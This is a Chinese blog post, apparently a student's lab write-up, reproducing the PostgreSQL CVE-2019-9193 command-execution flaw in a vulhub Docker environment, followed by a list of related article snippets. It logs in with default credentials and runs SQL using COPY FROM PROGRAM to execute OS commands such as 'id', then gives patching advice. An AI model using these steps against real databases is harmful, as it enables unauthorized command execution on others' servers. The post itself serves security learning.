(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量1.1k 收藏 11
点赞数 22
文章标签: postgresql 网络安全 web安全 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69801663/article/details/135163060
版权

漏洞概述

        PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

影响版本

9.3-11.2

环境搭建

1. 本次漏洞环境使用vulhub中的docker搭建,vulhub下载地址:

GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

2.下载完成后使用xftp传入安装有docker和环docker-compose境的虚拟机中解压并启动环境

cd vulhub-master/postgres/CVE-2019-9193

docker-compose up -d

3.使用docker ps查看是否启动成功

4.通过获取ip和映射的端口5432来连接数据库。

启动成功后使用navicat连接数据库,数据库初始账号密码为postgres/

postgres。

漏洞复现

1.执行删除你想用来保存命令输出但是可能存在的表,这一步可有可无

DROP TABLE IF EXISTS cmd_exec

2.创建用来保存命令输出的表:

CREATE TABLE cmd_exec(cmd_output text);

3.通过 “COPY FROM PROGRAM”执行系统命令

COPY cmd_exec FROM PROGRAM 'id'

4.将结果显示出来

SELECT * FROM cmd_exec

5.执行其他命令

whoami

SELECT * FROM cmd_exec

修复建议

1.建议升级至最新版本

2.控制数据库权限禁止普通用户执行命令

此漏洞是根据老师上课讲的知识以及网上的资料将漏洞复现出来,步骤简略,请各位见谅。

失之一灵
关注
漏洞复现PostgreSQL权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 399
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要权限所以要先弱口令爆破之后,然后查看是否是权限
PostgreSQL 权限命令执行漏洞CVE-2019-9193
SoulCat
05-27 4107
PostgreSQL 权限命令执行漏洞CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
CVE-2019-9193 PostgreSQL 权限命令执行漏洞
qq_51979295的博客
10-08 686
康复训练
Web安全基础学习:SQL注入漏洞PostgreSql注入
最新发布
qq_51862722的博客
06-18 1270
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
PostgreSQL 辟谣存在任意代码执行漏洞:消息不实
weixin_34221036的博客
04-12 388
开发四年只会写业务代码,分布式并发都不会还做程序员? >>> 近期在互联网媒体上流传 Postgr...
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3778
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193PostgreSQL 权限命令执行漏洞
m0_48520508的博客
01-20 888
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
PostgreSQL 权限命令执行漏洞CVE-2019-9193复现
玄道的网安博客
01-26 2559
简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 影响版本 9.3-11.2 漏洞概述 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_rea...
漏洞复现PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5573
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
PostgreSQL 权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 1070
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1245
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
CVE-2019-9193权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 615
vulhub靶场复现postgresql
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 915
PostgreSQL任意命令执行CVE-2019-9193
buuctf [Postgres]CVE-2019-9193
qq_1873822的博客
04-02 582
漏洞描述 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: 支持WINDOWS、Linux、Solaris、macOS 、BSD。 支持文本、图像、视频、声音等 支持ACID、关联完整性、数据库事务、Unicode多国语言。 支持临时表,与物化视图 支持SQL的许多功能,例如复杂的SQL查询
PostgreSQL 权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1828
#PostgreSQL 权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】
3569
03-07 2840
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...
PostgreSQL从弱口令到RCE(CVE-2019-9193
网络安全。
01-29 3088
0x01 简介 PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 0x02 影响版本 postgresql 9.3-11 0x03 漏洞复现 1、使用“超级弱口令”爆破处postgresql数据库账号密码。 2、使用“Navicat Premium”连接postgres...
6-23漏洞利用-postgresql代码执行利用
山兔的博客
07-31 735
修复在postgresql出现问题的时候,升级版本,避免出现安全事故,同时也要对默认安装好的软件,进行安全配置,防止默认配置造成的安全隐患,在实际的生产环境当中,我们无法做到快速升级版本,一个东西可能涉及的软件,还有很多,这个时候,我们采用更多的是,安全配置,以及防御的方式,来防止,我们这种软件,受到安全威胁。防御屏蔽任意IP连接postgresql,指定具体的IP地址,来连接postgresql,在一定程度上防御了远程位置IP,连接postgresql的风险。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

失之一灵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值